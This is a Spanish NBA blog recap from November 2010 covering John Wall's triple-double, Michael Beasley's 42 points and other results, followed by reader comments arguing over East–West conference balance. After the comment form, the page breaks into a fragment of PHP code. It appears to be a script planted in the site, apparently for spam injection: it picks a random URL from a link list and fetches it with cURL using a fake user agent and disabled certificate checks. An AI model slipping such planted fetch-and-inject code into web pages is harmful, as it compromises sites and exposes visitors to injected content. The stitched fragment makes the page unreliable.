La Crónica (10/11/2010)

11 de November de 2010 por TheDeerHunter

¡Qué escándalo señores! ¡Qué maravilla! “The Wonder” Wall no lleva ni una decena de partidos en la liga y ya está cerrando bocas a golpe de triples dobles. Anoche los asistentes al Verizon Center de Washington D.C. disfrutaron del comienzo de algo gordo, quizás de una nueva esperanza para ellos. Anoche su equipo funcionó colectivamente como hacía años, dirigido magistralmente por el chiquillo. En medio de ese nuevo orden “democrático” no es casualidad que el único que no encontró el punto fuera Arenas. En este contexto los Rockets no fueron más que un simple juguete (91-98). Scola y Martin pelearon cada uno por su cuenta y el resto directamente no dio el nivel. Qué cuesta arriba se les va poniendo la temporada.

Pero era noche de jovenes pujantes, de equipos humildes. Beasley ha tardado más de dos años en mostrarnos lo que apuntaba antes de pisar la liga, pero anoche se resarció de muchas cosas. Estuvo imparable contra los Kings coincidiendo además con un partido nefasto de Tyreke (98-89). Este resultado deja a los Raptors en la cola de la liga, después de caer contra unos Bobcats que no le ganaban a nadie, aunque anoche al lado de los de Triano parecieran un equipazo compensado y todo (101-96).

Brandon Jennings lideró con grandeza a sus Bucks en el asalto al Philips Arena de Atlanta (108-91). Menudo bajonazo de los Hawks con 3 derrotas seguidas. Ni que Marvin Williams fuera la clave de este equipo. Por parte del equipo de Schiles, impresionante acierto de Maggette (7 de 8 en TC) y muy buena actuación de Salmons e Ilyasova que definitivamente han despertado. 4 Victorias, 5 derrotas y subiendo.

En el duelo más interesante de la jornada los Jazz aprovecharon la inercia para endosarle la segunda derrota a Orlando en su propia casa (104-94). Howard volvió a pasar al ostracismo en el sistema de ataque de Van Gundy siendo el 5º jugador que más lanzamientos disfrutó. Además la defensa local brilló por su ausencia y Deron Williams y sus compañeros se lo pasaron de muerte haciendo lo que les vino en gana.

Cerrando el resumém: Los Nets se la devolvieron a Cleveland con un gran Devin Harris (95-87); en el Madison divertido partido de toma y daca entre Warriors y Knicks que se llevaron por poco los primeros (122-117); y por último victorias de los Thunder sobre Sixers (103-109), Mavs sobre Grizzlies (106-91) y Spurs sobre Clippers (95-107).

PREMIOS

MVP: 2 claros candidatos al título de mejor jugaror de la jornada. Uno se lleva también el de mejor rookie y el otro el de sorpresa. Obviamente el primero de ellos es John Wall que se quedó a 4 robos de conseguir un cuádruple doble (19 puntos , 10 rebotes, 13 asistencias y 6 robos). Tras Lebron James y Lamar Odom, se trata del tercer jugador más joven de la historia en lograr un triple doble y el sexto que lo consigue tras menos de 6 partidos como profesional. El otro protagonista es Michael Beasley del que pocos esperábamos algo destacado pero que ayer explotó con 42 puntos (17 de 31) y 9 rebotes.

Rookie: Obviando a John Wall, podemos destacar las actuaciones de Jordan Crawford (11 puntos y 3 rebotes), Derrick Favors (7 puntos, 7 rebotes), Blake Griffin (11 puntos, 8 rebotes, 3 asistencias y 3 robos) o Demarcus Cousins (7 puntos, 6 rebotes y 2 tapones).

Sorpresa: Aprovechando la baja por lesión de Troy Murphy, Kris Humphries ha salido de titular haciendo de la zona su terreno particular. 13 puntos y 18 rebotes.

Decepción: Muy mala noche para OJ Mayo, capaz de anotar tan solo 4 puntos en una serie de 1 de 8 en lanzamientos.

Esfuerzo en vano: Amare Stoudamire dejó los Suns en busca de no se sabe muy bien qué y de momento lo que se ha ganado es una mayor probabilidad de ganar el premio al mayor esfuerzo en vano del día. De momento ya tiene 1, el que consiguió ayer con 33 puntos y 10 rebotes que no le permitieron llevarse la victoria.

Comenta

36 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Menudo par de estacazos de los mormones a los dos gallitos del Este, encima d la manera que mas duele,remontando ventajas de 20 puntos y apuntillando en el ultimo cuarto. Deron mandando,anotando y repartiendo como solo el sabe hacer,Millsap tocado con una varita y por dentro un cada vez mas asentado Al Jefferson. Hay que tomarse en serio a estos Jazz.
    Parece que ya tenemos un nuevo miembro del club ” hago d todo y todo lo hago bien”,nivelado el del St. Wall.

      Citar

  2. TheDeerHunter dice:
    #2

    El desequilibrio Este-Oeste es brutal. Y no me lo esperaba.
    Los Nuggets están fuera de los 8 primeros puestos… y en el Este estarían cuartos. Los Warriors están igualados con los Celtics al frente de la tabla…Memphis está lejos de plaza de playoffs con el mismo balance que los Bucks.
    Tremendo.

      Citar

  3. Tiago dice:
    #3

    Los Spurs a lo suyo, buena defensa y muy seguros en el tiro! Duncan mal pero tampoco ha hecho falta. Y a Splitter se le ha visto más cómo y duro en defensa.

    Anda que Wall ha tardado mucho en cerrar bocas, entre ellas a lemontus que presumía del triple doble de Jennings, pero bueno, el tiempo pone a cada uno en su lugar. Estamos ante en nacimiento de un all star en toda regla.

      Citar

  4. LEmontus dice:
    #4

    Primer partido de verdad de Wall metiendo canastas cuando hay que meterlas y el resultado Vicotoria que es lo que importa.

    Bucks Mejorando poco a poco y todavía no estamos viendo al mejor Bogut….

    Para Deer no se pueden comaparar conferencias por eso , osea no se puede decir que una conferencia sea mejor que otra porque un equipo en una conferencia sea4º y e otra último.

      Citar

  5. TheDeerHunter dice:
    #5

    Bueno, yo la frase “una mejor que otra” no la he utilizado. He hablado de desequilibrio… que es palpable. También es pronto para decirlo, pero el rollo es que llevamos muchos años así y yo pensaba que durante éste se podría invertir la tendencia.

    De todas formas me intriga tu argumentación. ¿Porqué no puedes calificar conferencias según su balance promedio de victorias? Si una conferencia tiene un promedio de victorias mucho más alta que la otra será por algo…

      Citar

  6. LEmontus dice:
    #6

    Tiago no te engañes Wall no vale se demostrará a buen seguro.

      Citar

  7. Hynreck dice:
    #7

    El desnivel entre conferencias entre conferencias al que se refiere Deer se ve sobre todo en la clase media de ambas. El quinto del este (y el cuarto incluso si me apuran) no creo que lograse meterse en playoffs en el oeste.

      Citar

  8. pcerezo dice:
    #8

    Por desgracia el Este sigue siendo un solar. Celtics y Heats son lo mejor!!!!
    Pregunta: los Heats en el Oeste en que posición quedarían?

    Está claro que con ese contrato Stoudamire ha solucionado su vida y el las dos próximas generaciones de toda su familia, pero….

      Citar

  9. LEmontus dice:
    #9

    y por cierto el que lideró a los bucks ayer fue boykins que con en él en pinta no solo se remontó un resutado de 14 puntos si no que acabó dejando a bucks 8 arriba luego jennings supo continuar lo que empezó boykins

      Citar

  10. Scriers dice:
    #10

    Stou buscaba dinero. Porque teniendo a Nash y a un equipo donde los suplentes dan, y mucho, la talla, lo lógico hubiera sido insistir, y si eres verdaderamente grande, trabajar por una revancha frente a Lakers. Pero 20 millones de dolares y New York, más la posibilidad de compartir en un futuro equipo con Melo o Paul, serán motivaciones suficientes. Porque estaba claro que ni con Wade, ni Bosh ni James habían mostrado verdadero interés.
    Yo lo que vi ayer de Wall, 3/4 partes del partido, me pareció una salvajada. Y me gusta el chino Li, aunque estuviera fallón.
    A los Rockets los vi de capa caída y con un único hombre remando en una dirección decente. Luis Scola. El resto era una banda, sobre todo defendiendo (Qué mal Lowry). Y no se yo si Martin le ha venido bien a este equipo, porque anotar, anota, pero defender…
    Perdí también algo de mi tiempo viendo Toronto, que juega tremendamente anárquico, con un Calderón que mezcla luces con sombras y que defensivamente es una rémora enorme. Ahí jugaba el que he votado como jugador más evolucionado del año, dj augustin, que hizo 16 puntos 7 asistencias y 3 robos.

    Por lo demás, al descanso el partido entre Utah y Orlando era vibrante e intensísimo y parecía que ganaba Utah… como así ha sido. Me caen bien.
    Y el resto de la jornada, pues no se, ahora leeré. Buenos resúmenes The… es increíble que seas tan puntual a la cita.

      Citar

  11. TheDeerHunter dice:
    #11

    Ojo… que el artículo lo he firmo yo porque lo tiene que firmar alguien, pero en TJNBA casi siempre somos un equipo.

    Noah metiendo caña a Garnett: http://sports.espn.go.com/chicago/nba/news/story?id=5789761
    Perlas como “es mezquino y feo” (…) “es el único mezquino con los rookies y con los europeos”
    y eso que reconoce haber sido fan suyo de chavalín…
    fiuuuu

      Citar

  12. Jona dice:
    #12

    vamos coño GS vuelve a playoffs este año joder ¡ XD

      Citar

  13. Denise dice:
    #13

    Que el nivel medio de la conferencia Oeste es mejor que el del Este lo ve hasta un ciego, solo tienes que mirar roster por roster para darte cuenta de ello. En el Este hay 3 equipos muy buenos, y tres normales que sudarían tinta para conseguir la 7º u 8º plaza de PO en el Oeste. En cambio, en el Oeste hay hasta 12 equipos (todos menos Clippers, Kings y Timberwolves) que jugarían facilmente Playoffs si jugasen en el Este.
    Sólo el Dios Lemontus y otros visionarios como él, pueden pensar que el nivel medio del Este es mayor que el del Oeste, vamos, compara Grizzlies, Suns, Hornets, Rockets, Nuggets, Blazers, o Jazz con Bucks, Knicks, Pacers, Nets!!!, Cavaliers!!!, Wizards!!!, Pistons!!!..

    Van Gundy Dimision!!, Por que Howard tuvo tan poco protagonismo siendo defendido por Jefferson, que ni siquiera es un Center puro?? Y como se puede escapar ese partido y no sé capaz de reaccionar
    Sin ánimo de ser pesado, ayer, entre Duhon, Quentin y Redick, 45 minutos, con un rendimiento de 5 puntos, 3 rebotes y 5 asistencias entre los tres. Hasta el infame trío Farmar-Vujacic-Walton lo hubiese hecho mejor.

      Citar

  14. HisRoyalAirness dice:
    #14

    Yo la conclusión que saco de lo (poco) que llevamos de competición es clara: como equipo Los Lakers no tienen rival. Parecen adaptarse a cualquier circunstancia sin pestañear y los veo mucho mejor en conjunto que el año pasado.
    Los triples dobles, records de asistencias, alley-oops etc etc me parecen simplemente datos, sin más.
    El único equipo al que veo con suficientes mimbres y profundidad de plantilla como para derrotarlos en una serie son los Celtics, y no sé como llegarán a postemporada.
    La mejor noticia de este inicio para mì es Blake “que bueno que viniste” Griffin. Wall apunta muy alto pero yo le veo aún muy verde de cabeza, poco maduro, no sé

      Citar

  15. LEmontus dice:
    #15

    Gracias poor denominarme visionario… Decir que Utah es mejor que chicago o bucks si e suna burrada y decir que Bucks o Chicago sudarían tinta para entrar en po en alguna conferencia sea cual sea si quieres que comparemos equipos/rosters lo hacemos, por mi encantado.

      Citar

  16. Denise dice:
    #16

    Yo no he dicho que Utah sea mejor que Bucks o Chicago, o al reves. Estoy hablando del nivel medio de la conferencia. Y por cierto, si tuviermaos la oportunidad de ver una ronda de playoffs Jazz-Bucks, no se decidiría en 5 partidos, y, personalmente, apostaría por los jazz.

    PD: También te he llamado Dios 🙂

      Citar

  17. Denise dice:
    #17

    Además solo hablas de los Bucks y de los Bulls, y qué de los extraordinarios equipos de los Nets, los Cavs, Pacers, los Pistons, Raptors, Sixers, Bobcats, uhhh, en el Oeste deben estar temblando cuando juegan contra estos equipuchos

      Citar

  18. Tiago dice:
    #18

    Es evidente que el Oeste es muy superior al Este, incluso viendo como equipos como Suns han perdido todas sus opciones de dar la sorpresa.

    Si Wall verde rinde a este nivel, no quiero pensar como será cuando esté madurito.

      Citar

  19. Txusma dice:
    #19

    Cuando esté madurito a lo mejor se cae del árbol. Apunta unas maneras tremendas pero yo creo que el segundo año de un jugador es aún más importante que el primero.

      Citar

  20. Denise dice:
    #20

    Tiago, qué opciones han perdido los Suns?? Tras 7 partidos, ya lo descartas para Playoffs?

    PD: ¿Tiago y lemontus son la misma persona? siempre que habla uno, al rato, aparece el otro….

      Citar

  21. troll dice:
    #21

    Que cojines es esto de los números?

      Citar

  22. HisRoyalAirness dice:
    #22

    A eso me refiero, lo que dice Txusma de que hay que ver como va evolucionando.Ya sé que el chaval es un superclase, no hay más que verlo, pero creo que le pueden las prisas, las estadísticas y las ganas del ROY

      Citar

  23. pcerezo dice:
    #23

    He decidido no contestar a los comentarios de Lemontus porque no tienen ningún sentido. Para mí un aficionado que dice que Delfino es mejor que Lebron James, Kobe Bryant y el retos de escoltas y aleros de la liga no merece entrar al trapo. He leído incluso que Bogut era mejor que Dwight Howard y que Jennings iba a hacer mejor carrera que Isiah Thomas.

    En cuanto a la discusión del Oeste-Este es un debate que se sostiene no solo por las victorias-derrotas de los equipos si no además por los roasters.
    Por poner un ejemplo claro: el roster de los Bucks no aguantaría jugar 4 partidos contra Lakers, Spurs, Mavs, Suns, Grizzlies, Portland, OKC, Jazz, Hornets… Los demás que nombra Denise no alcanzarían ni las 20 victorias.

    Por tanto dejémosnos de forofismos y analicemos con má criterio.

      Citar

  24. GreenPride dice:
    #24

    Bueno, pues hoy he visto el Magic-Jazz. De nuevo remontada de los Jazz ante un gallito del Este, de nuevo liderada por un inmenso Deron Williams y de nuevo gran movimiento táctico de Sloan que perdiendo por 18 puso una zona 2-3 que significó un inmediato 24-2 para su equipo que dio la vuelta al partido. Pésimo partido de Howard que no dio una en ataque y en defensa vio como Jefferson le metio 2 o 3 canastas en los momentos decisivos del partido en su cara.
    En cuanto a lo de Este-Oeste, creo que la clase media del Oeste es mejor que la del Este y que además los equipos del Oeste lo saben e intentan empezar a tope pq saben que la entrada en los playoffs estará muy cara, no como los últimos puestos del Este.
    Hasta ahora los Lakers parecen claramente el mejor equipo pero hay que tener en cuenta que no han jugado todavia con ningún equipo en condiciones y que aún es muy pronto para sacar verdaderas conclusiones.
    A ver que pasa esta noche en el Heat-Celtics…..

      Citar

  25. LEmontus dice:
    #25

    Por favor no me relacioneis con una persona que de los SAS… Bueno para ustedes la perra gorda pero a partir de ahora resaltaré los equipos de oeste a los que Bucks gana.

    Denise casi siempre hablo de bucks porque es mi equipo y es el que más conozco y del que más puedo hablar.(Lo de bulls no se de donde te lo has sacado porque los odio).

      Citar

  26. Txusma dice:
    #26

    Victorias de los Bucks frente equipos del Oeste: 0
    Derrotas de los Bucks frente equipos del Oeste: 4 (Hornets, Wolves, Blazers y otra vez Hornets)

    Ahora ya podemos empezar a llevar la cuenta.

      Citar

  27. TheDeerHunter dice:
    #27

    Más datos:
    35 duelos interconferencias en lo que llevamos de competición. 24 victorias Oeste para las 11 del Este. Casi un 70% de victorias para el oeste… o lo que es lo mismo, de cada 3 choques que se juegan entre equipos de distinta conferencia 2 se lo llevan equipos del Oeste.
    El dato sonroja hasta el punto que de todas las jornadas que llevamos jugadas en una sola han vencido mayoritariamente equipos del este. En 8 jornadas los del Oeste.

    Creo que no hay mucha discusión al respecto. Aunque dudo bastante (y no me gustaría) que siguiera esta costumbre.

      Citar

  28. HisRoyalAirness dice:
    #28

    Los Lakers aún no han jugado contra rivales serios, estamos de acuerdo, pero es que Kobe aún no está a tope y Bynum está lesionado. Con estos dos al 100×100 no me imagino lo que puede ser jugar contra ellos…
    Para empezar creo que los Heat no podrÌan con ellos ni aunque D-Wade y Lebron metieran 40 puntos cada uno porque no tienen nada que hacer ante la rotación interior de Lamar, Pau y Bynum. Sólo en la pintura los liquidan

      Citar

  29. Tiago dice:
    #29

    Si tio soy Lemontus y soy de Bucks…anda…

    Denise, no les quito a Suns las opciones de ir a Playoffs, pero si les quito las opciones de llegar a donde llegaron el año pasado…lo mismo me callan la boca pero no lo creo.

    Es evidente que me encanta Wall, pero estoy de acuerdo en que el segundo año es mas importante que el primero y lo mismo en un futuro la caga, pero mientras tanto me regodearé a su costa xD.

      Citar

  30. portu dice:
    #30

    Lo del nivel medio de las Conferencias es cierto q es más alto en el Oeste, pero pese a resultados como el de ancohe del Orl-Uta, yo creo q si los playoffs fuesen sin conferencias, para mi habría al menos 3 escalones diferentes: 1. LAL; 2. Miami, Boston y Orlando; y 3, casi todos los equipos restantes de playoffs del Oeste con Chicago quizás rozando ese nivel.

      Citar

  31. kantonyo dice:
    #31

    Estoy de acuerdo en que por ahora el nivel medio del Oeste parece mucho mejor que el del Este. Y eso que parecía que este año se iban a igualar las cosas. La verdad que aunque parezca masoca, gente como LeMontus le ha dado vida al foro, jajajaja, por lo menos ha conseguido que me interese un poco por Bucks….
    Por otra parte, a veces los comentarios se pasan de tono, molaria que fuerais prudentes y que solo nos ataquemos deportivamente hablando… Por lo demás cada vez me mola más el blog, tanto por los articulos como por los comentarios. Es el mejor lugar en español para aprender y estar informado sobre la NBA. Sois todos unos cracks!!

      Citar

  32. ichigo9999 dice:
    #32

    Los bucks molan, eso nadie lo puede negar

      Citar

  33. Denise dice:
    #33

    Lemontus, lo de los Bulls te lo digo, porque tú eres el que has dicho que son mejores que Jazz.
    Los datos que ha puesto encima de la mesa Deerhunter hablan por sí solos.

      Citar

  34. LEmontus dice:
    #34

    Yo no me guío por datos me guío por equipo y si tu me dices que el equipo de Utah es mejor que el de Chicago simplemnete no volveremos a tener una discusión más porque lo vería una tontería.

    Ojo Chicago con Boozer aunque Taj gibson no disgusta a nadie.

      Citar

  35. TheDeerHunter dice:
    #35

    Pues no sé muy bien qué es lo que tiene Chicago mejor que Utah. ¿Contra quien han empatado los bulls en todos estos años?
    A los Bulls les falta Boozer, pero a los Jazz también les falta Okur.

    Yo los veo bastante similares en cuanto a plantillas… con un punto muy grande a favor de los mormones: Se llama Jerry Sloan. En un hipotético duelo de playoffs entre ellos me jugaría los cuartos por ellos, sin dudarlo.

      Citar

  36. busky23 dice:
    #36

    Me levante del sofa,lo veia dentro…pero golpeo en el aro y no quiso entrar,lo siento por Rudy,se lo merecia.
    Menuda bestialidad del amigo Love,CARPANTA!!!!!!!
    Por cierto,36 años,por la mañana fue papa,y horas despues,para celebrarlo les endosa a los Kings 28 puntos, 14 asistencias y 7 rebotes…ese pequeño canadiense llamado Nash…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>